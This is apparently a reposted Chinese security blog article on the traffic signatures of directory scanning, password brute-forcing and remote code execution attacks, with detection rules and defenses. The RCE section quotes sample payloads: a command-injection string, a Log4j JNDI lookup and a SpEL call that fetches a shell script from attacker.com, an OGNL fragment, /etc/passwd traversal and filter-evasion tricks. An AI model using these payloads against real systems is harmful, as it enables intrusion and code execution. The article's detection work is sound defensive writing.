【HW系列】—目录扫描、口令爆破、远程RCE流量特征

news2025/5/31 22:13:19

本文仅用于技术研究,禁止用于非法用途。

文章目录

  • 目录扫描漏洞的流量特征及检测方法
      • 一、基础流量特征
      • 二、工具特征差异
      • 三、绕过行为特征
      • 四、关联行为特征
      • 五、检测与防御建议
  • 口令爆破漏洞的流量特征及检测方法
      • 一、基础流量特征
      • 二、工具标识特征
      • 三、绕过行为特征
      • 四、响应关联特征
      • 五、检测与防御建议
  • RCE漏洞的流量特征及检测方法
      • 一、请求构造特征
      • 二、攻击载荷特征
      • 三、工具与行为特征
      • 四、响应特征
      • 五、检测与防御建议

目录扫描漏洞的流量特征及检测方法

目录扫描漏洞的流量特征主要体现在高频异常请求模式、特定工具标识和服务器响应异常等方面。以下为基于搜索结果整理的核心特征及检测策略:


一、基础流量特征

  1. 高频短时请求
    • 短时间内发起大量HTTP请求(如每秒数十次),且请求行中的URL路径部分连续变化,例如依次尝试 /admin、/login、/backup 等敏感目录。
    • 示例流量:
GET /admin HTTP/1.1  
GET /wp-admin HTTP/1.1  
GET /.git/config HTTP/1.1
  1. 异常响应码分布
    • 服务器返回大量 404 Not Found 状态码(占比超过90%),少量 200 OK 或 403 Forbidden 响应可能对应存在的敏感路径。
  2. 参数与路径构造特征
    • 请求路径中常包含常见敏感文件名(如 config.php、web.xml)或目录名(如 /uploads、/database)。
    • 使用连续字母或数字排列的路径(如 /a → /b → /c)探测目录结构。

二、工具特征差异

不同扫描工具的流量具有显著标识:

  1. 御剑
    • 主要使用 HEAD 方法,请求头仅包含基础字段(Host),无其他扩展头(如Cookie、Referer)。
    • 响应包长度极短(因HEAD方法不返回正文)。
  2. DirBuster
    • User-Agent 包含工具标识(如 DirBuster/1.0),且可能附带版本信息。
    • 采用多线程模式,请求间隔时间随机性较低。
  3. Dirb
    • User-Agent 伪装为老旧浏览器(如 Internet Explorer 6.0),此类标识在正常流量中极少出现。
  4. Dirsearch
    • 路径尝试包含动态扩展名(如 .php、.jsp)与目录组合(如 /admin/login.php)。

三、绕过行为特征

  1. 编码混淆
    • 对路径进行URL编码(如 %2e%2e%2f 表示 …/)或双重编码(如 %252e%252e%252f)以绕过基础过滤规则。
    • 示例:
GET /%77%70%2d%61%64%6d%69%6e HTTP/1.1  // 对应 "/wp-admin"
  1. 协议级试探
    • 结合 HTTP/1.0 与 HTTP/1.1 交替请求,测试服务器兼容性。
    • 使用分块传输编码(Transfer-Encoding: chunked)规避内容长度检测。

四、关联行为特征

  1. 存活检测机制
    • 在扫描前发送固定探测请求(如 GET /robots.txt 或 GET /favicon.ico)确认目标可达性。
  2. 敏感路径深度探测
    • 对发现的潜在敏感路径发起二次遍历(如发现 /admin 后继续尝试 /admin/config.ini)。
  3. 与目录遍历漏洞联动
    • 扫描完成后可能触发目录遍历攻击(如尝试 /images/…/…/etc/passwd),此类流量会携带 …/ 符号和系统敏感文件路径。

五、检测与防御建议

  1. 流量检测规则
    • 统计单IP的404响应率阈值(如1分钟内404占比 >70% 则告警)。
    • 匹配User-Agent中的工具标识(如 DirBuster、sqlmap)。
  2. 防御策略
    • 路径白名单:限制应用仅允许访问预设目录,拒绝非常规路径请求。
    • 动态混淆:对不存在路径返回相同长度的随机内容,干扰扫描器判断。
    • 频率限制:设置IP请求速率阈值(如每秒 ≤10次)。

口令爆破漏洞的流量特征及检测方法

口令爆破漏洞的流量特征主要体现在高频请求模式异常参数构造工具标识特征等方面。以下结合多篇技术文档整理的核心特征及检测策略:


一、基础流量特征

  1. 高频重复请求
    • 短时间内(如1分钟内)同一IP向同一登录接口发起数十至数百次请求,请求间隔时间短且规律性强(如固定0.5秒/次)。
    • 典型场景:
POST /login HTTP/1.1  
username=admin&password=123456  
POST /login HTTP/1.1  
username=admin&password=admin  
POST /login HTTP/1.1  
username=admin&password=Password123  
  1. 参数构造特征
    • 密码字段值呈现字典化特征(如 password=123456、password=admin、password=Welcome2023);
    • 部分请求携带特殊符号(如 password=abc!@#)或变形规则(如 password=Admin123 → Adm1n123);
    • 存在参数名混淆(如 pwd、passwd、pass 交替出现)或加密字段(如 u_pwd=5f4dcc3b5aa765d61d8327deb882cf99)。

二、工具标识特征

  1. User-Agent 异常
    • 包含自动化工具标识(如 sqlmap/1.*、XSSer/1.0)或老旧浏览器版本(如 Internet Explorer 6.0);
    • 存在自定义字符串(如 BruteForceBot)或缺失标准头信息(如无 Referer 字段)。
  2. 请求头关联行为
    • 固定会话ID重复使用(如 Cookie: JSESSIONID=xxx 连续出现在不同请求中);
    • 缺少正常用户交互头(如 Accept-Language 字段单一、无 DNT 隐私标识)。

三、绕过行为特征

  1. 编码混淆技术
    • 对密码字段进行多重编码(如URL编码 %61%64%6d%69%6e 表示 admin);
    • 使用动态盐值拼接(如 password=MD5(pass+salt))或加密函数(如 RSA(public_key, password))。
  2. 验证码绕过策略
    • 请求中固定验证码值(如 code=000000)或直接删除验证码参数;
    • 利用验证码接口未绑定会话的漏洞,通过多线程并发绕过校验。

四、响应关联特征

  1. 异常响应码分布
    • 大量 401 Unauthorized 或 403 Forbidden 响应(占比超90%),偶现 200 OK(成功命中正确密码);
    • 返回包长度呈现规律性差异(如错误响应固定为200字节,成功响应扩展至500字节)。
  2. 敏感信息泄露
    • 错误响应中暴露账号有效性提示(如 {“code”:1,“msg”:“密码错误”} 与 {“code”:2,“msg”:“用户不存在”});
    • 成功登录后返回过度的用户信息(如角色权限、Token有效期等)。

五、检测与防御建议

  1. 流量检测规则
    • 统计单IP请求频率阈值(如60秒内同一接口请求 >30次触发告警);
    • 匹配密码字段值的弱口令字典特征(如正则规则 password=.123.)。
  2. 防御策略
    • 多因素认证:强制启用短信/邮箱验证码或生物识别;
    • 动态锁定机制:单账号连续失败5次锁定30分钟,或引入渐近延迟(如第N次失败后等待N²秒);
    • 行为分析:结合IP信誉库、设备指纹和登录地理位置进行风险评估。

RCE漏洞的流量特征及检测方法

远程代码执行(RCE)漏洞的流量特征可从请求构造异常、攻击载荷特征、工具标识和响应行为等多个维度分析。以下是基于多篇技术文档整理的核心特征及检测策略:


一、请求构造特征

  1. 异常参数构造
    • 特殊符号高频出现:请求参数中包含命令分隔符(如 ;、|、&&)、逻辑运算符(如 ||)或反引号(`),用于拼接恶意指令。
      示例:http://example.com/ping?ip=127.0.0.1; whoami
    • 编码混淆:参数值经过URL编码、Base64或十六进制转换,例如 %3B(对应 ;)或 d2hvYW1p(whoami的Base64编码)。
    • 动态语言函数调用:如PHP的 eval($_POST[‘code’]) 或Java的 Runtime.getRuntime().exec(),流量中可能包含 eval、system 等敏感函数名。
  2. 序列化数据特征
    • 反序列化攻击:请求体中包含Java/Python序列化数据,特征为二进制流或编码后的JSON/XML结构,可能携带恶意类名(如 CommonsCollections)或方法调用链。
    • 模板注入(SSTI):请求参数包含模板引擎语法,如Jinja2的 {{7*7}} 或SpEL的 T(java.lang.Runtime).exec(‘id’)。

二、攻击载荷特征

  1. 命令注入特征
    • 系统命令高频出现:如 whoami、cat /etc/passwd、netstat -an 等探测或提权指令。
    • 路径遍历与敏感文件操作:如 …/…/etc/passwd 或 C:\Windows\System32\drivers\etc\hosts,用于读取系统文件。
  2. 框架/组件漏洞利用特征
    • Log4j2 JNDI注入:流量中包含 ${jndi:ldap://attacker.com/exp} 等格式的Payload。
    • Spring SpEL注入:利用表达式语言执行命令,如 T(java.lang.Runtime).getRuntime().exec(‘curl attacker.com/shell.sh’)。
    • Apache Struts OGNL注入:如 %{(#_=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm)}。

三、工具与行为特征

  1. 自动化工具标识
    • User-Agent异常:包含 sqlmap、Burp Suite 或自定义扫描器标识(如 XSSer/1.0)。
    • 高频试探性请求:短时间内对同一接口发起多次变种攻击,例如尝试不同编码方式的Payload或命令组合。
  2. 绕过行为特征
    • 通配符与转义符滥用:如 cat /et?/pass* 或 c\at hello.txt,利用系统解析规则绕过过滤。
    • 未初始化变量注入:在命令末尾追加空变量(如 $a),利用系统对空值的忽略特性绕过黑名单。

四、响应特征

  1. 异常响应内容
    • 命令执行结果回显:响应中包含系统命令输出(如用户权限信息、文件内容)。
    • 错误信息泄露:如Java堆栈跟踪暴露 java.lang.Runtime.exec() 的调用路径,或PHP的 eval() 错误提示。
  2. 响应长度与状态码异常
    • 成功执行时的响应扩展:例如正常请求响应长度为200字节,成功执行后因回显结果增至500字节。
    • 错误码激增:大量 500 Internal Server Error 或 400 Bad Request,可能因恶意Payload触发解析失败。

五、检测与防御建议

  1. 流量检测规则
    • 正则匹配:针对命令分隔符(如 ;、|)、敏感函数名(如 eval、exec)和常见Payload(如 jndi:、T(java.lang.Runtime))设计规则。
    • 行为分析:监控单IP的高频请求(如1分钟内超过50次)或异常响应码分布(404/500占比超过80%)。
  2. 防御策略
    • 输入白名单验证:限制参数格式(如IP地址正则匹配)并过滤危险符号。
    • 禁用危险函数:在PHP配置中设置 disable_functions = system, exec,或Java中限制 Runtime.exec() 的调用权限。
    • 安全框架集成:使用RASP(运行时应用自保护)技术监控代码执行上下文,阻断异常调用链。

注:本文遵循CSDN社区内容规范,不涉及具体攻击实现,重点探讨防御方法论。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2391935.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

如何在WordPress网站中添加相册/画廊

在 WordPress 网站上添加相册可以让您展示许多照片。无论您是在寻找标准的网格相册画廊还是独特的瀑布流相册画廊体验,学习如何在 WordPress 网站上添加相册总是一个好主意。在本教程中,我们将介绍两种为 WordPress 网站添加相册的方法:使用区…

Codeforces Round 1025 (Div. 2)

Problem - A - Codeforces 查有没有人说谎&#xff0c;有一个必错的情况&#xff1a; 两个人都说输了&#xff0c;必有人撒谎&#xff0c;还有就是所有人都赢了&#xff0c;也是撒谎 来看代码&#xff1a; #include <iostream> #include <vector> using namespa…

Ubuntu20.04操作系统ssh开启oot账户登录

文章目录 1 前提2 设置root密码3 允许ssh登录root账户3.1 编辑配置文件3.2 重启ssh服务 4 安全注意事项 1 前提 ssh可以使用普通用户正常登录。 2 设置root密码 打开终端&#xff0c;设置密码 sudo passwd root # 设置root密码3 允许ssh登录root账户 3.1 编辑配置文件 su…

类欧几里得算法(floor_sum)

文章目录 普通floor_sum洛谷P5170 【模板】类欧几里得算法 万能欧几里得算法求 ∑ i 1 n A i B ⌊ a i b c ⌋ \sum_{i1}^{n}A^iB^{\lfloor \frac{aib}{c} \rfloor} ∑i1n​AiB⌊caib​⌋求 ∑ i 0 n ⌊ a i b c ⌋ \sum_{i0}^n \lfloor\frac{aib}{c}\rfloor ∑i0n​⌊caib…

每日Prompt:卵石拼画

提示词 世界卵石拼画大师杰作&#xff0c;极简风格&#xff0c;贾斯汀.贝特曼的风格&#xff0c;彩色的鹅卵石&#xff0c;斑马头像&#xff0c;鹅卵石拼画&#xff0c;马卡龙浅紫色背景&#xff0c;自然与艺术的结合&#xff0c;新兴的艺术创作形式&#xff0c;石头拼贴画&am…

硬件服务器基础

1、硬件服务器基础 2、服务器后面板 3、组件 3.1 CPU 3.2 内存 3.3 硬盘 3.4 风扇 4、服务器品牌 4.1 配置 4.2 CPU 架构 4.2.1 CPU 命名规则 4.2.2 服务器 CPU 和家用 CPU 的区别 4.2.3 CPU 在主板的位置 4.2.4 常见 CPU 安装方式 4.3 内存中组件 4.3.1 内存的分类 4.3.1.1 …

TRS收益互换平台开发实践:从需求分析到系统实现

一、TRS业务概述 TRS&#xff08;Total Return Swap&#xff09;收益互换是一种金融衍生工具&#xff0c;允许投资者通过支付固定或浮动利息&#xff0c;换取标的资产&#xff08;如股票、指数&#xff09;的收益权。典型应用场景包括&#xff1a; ​​跨境投资​​&#xff…

测试Bug篇

本节概要&#xff1a; 软件测试的生命周期 bug的概念 buh要素 bug等级 bug生命周期 对于bug的定级与开发发生冲突如何解决 一、 软件测试的⽣命周期 软件测试贯穿于软件的整个生命周期&#xff0c;针对这句话我们⼀起来看⼀下软件测试是如何贯穿软件的整个生命周期。 软…

【Linux系统移植】Cortex-A8 Linux系统移植(超详细)

目录 前言 一、ARM开发板ARM简介RISC和CISCARM产品分布核心板S5pv210 SOC嵌入式系统开发方式 二、嵌入式系统组成为什么要系统移植内核移植框图 三、嵌入式开发环境搭建搭建开发环境总流程设置ubuntu与windows共享目录修改用户为root用户安装NFS服务器安装tftp服务器安装交叉编…

第十五届蓝桥杯大赛软件赛国赛Python 大学 C 组试做【本期题单: 设置密码、栈】

早上好啊大伙&#xff0c;这一期依旧是蓝桥杯备赛刷题的记录。 本期题单&#xff1a;设置密码、栈 前言 前段时间准备省赛&#xff0c;运气好进国赛了。所以就开始准备6月份的国赛。但是近期还有别的比赛要准备&#xff0c;所以刷题的速度比较慢&#xff0c;可能每一期就会有一…

报错SvelteKitError: Not found: /.well-known/appspecific/com.chrome.devtools.json

报错信息 SvelteKitError: Not found: /.well-known/appspecific/com.chrome.devtools.json 解决方案一 更新所有依赖 npm update解决方案二&#xff08;不一定成功&#xff09; src\lib\hooks.server.ts&#xff0c;每次请求服务器时执行 import type { Handle } from &…

word添加页眉

问题一&#xff1a; 为word文档添加页眉。 方法&#xff1a; 1、在要添加页眉的第一页页面顶端双击页眉区域&#xff0c;如果添加页眉页上面还有其他页或者与上一页添加页眉内容不同&#xff0c;记得取消“链接到前一节”&#xff08;点击使其上面没有灰色即可&#xff09;&…

2025推客系统小程序开发:独立部署源码交付,高性价比裂变增长引擎

在私域流量争夺白热化的今天&#xff0c;源码独立部署的推客系统小程序已成为企业构建自主分销体系、降低获客成本的核心利器。基于成熟案例与技术沉淀&#xff0c;我们提供安全可控、高性价比的一站式解决方案&#xff0c;助力企业快速搭建专属推客生态&#xff0c;实现长效增…

CentOS 7.0重置root密码

文章目录 版本&#xff1a;CentOS 7.0内核版本&#xff1a;CentOS Linux, with Linux 3.10.0-123.el7.x86_64 服务器重启后&#xff0c;等待进入上述页面&#xff0c;按⬆⬇键&#xff0c;中断正常启动。在此页面按E&#xff0c;进入编辑模式 继续按⬇&#xff0c;找到linux16…

YOLOV11改进策略【最新注意力机制】CVPR2025局部区域注意力机制LRSA-增强局部区域特征之间的交互

1.1网络结构 1.2 添加过程 1.2.1 核心代码 import torch import torch.nn as nn import torch.nn.functional as F from einops import rearrangedef patch_divide(x, step, ps):"""Crop image into patches.Args:x (Tensor): Input feature map of shape(b, …

DAY33 简单神经网络

你需要自行了解下MLP的概念。 你需要知道 梯度下降的思想激活函数的作用损失函数的作用优化器神经网络的概念 神经网络由于内部比较灵活&#xff0c;所以封装的比较浅&#xff0c;可以对模型做非常多的改进&#xff0c;而不像机器学习三行代码固定。 1. 神经网络的概念 (Th…

OBOO鸥柏丨2025年鸿蒙生态+国产操作系统触摸屏查询一体机核心股

在信创产业蓬勃发展的当下&#xff0c;OBOO鸥柏积极响应纯国产化号召&#xff0c;推出基于华为鸿蒙HarmonyOS操作系统的触摸屏查询一体机及室内外场景广告液晶显示屏一体机上市&#xff0c;OBOO鸥柏品牌旗下显示产品均采用国产芯片&#xff0c;接入终端控制端需支持安卓Windows…

【观成科技】Ymir勒索软件组织窃密木马RustyStealer加密通信分析

1.概述 Ymir勒索软件首次发现于2024年7月&#xff0c;采用ChaCha20加密算法对受害者文件进行加密&#xff0c;加密文件后缀为.6C5oy2dVr6。在攻击过程中&#xff0c;Ymir勒索组织利用名为RustyStealer的窃密木马获取受害企业的账号凭证&#xff0c;为后续横向移动和权限提升奠…

Vuer开源程序 是一个轻量级的可视化工具包,用于与动态 3D 和机器人数据进行交互。它支持 VR 和 AR,可以在移动设备上运行。

​一、软件介绍 文末提供程序和源码下载 Vuer开源程序 是一个轻量级的可视化工具包&#xff0c;用于与动态 3D 和机器人数据进行交互。它支持 VR 和 AR&#xff0c;可以在移动设备上运行。 二、Our features include: 我们的功能包括&#xff1a; light-weight and performa…

短视频一键搬运 v1.7.1|短视频无水印下载 一键去重

短视频一键搬运是一款全自动智能处理软件&#xff0c;专为短视频创作者设计。它自带去水印、改MD5码、视频去重、视频编辑等功能&#xff0c;能够高效处理大量视频&#xff0c;解放双手并降低成本。该软件支持从多个短视频平台无缝提取视频并去除水印&#xff0c;同时检测敏感词…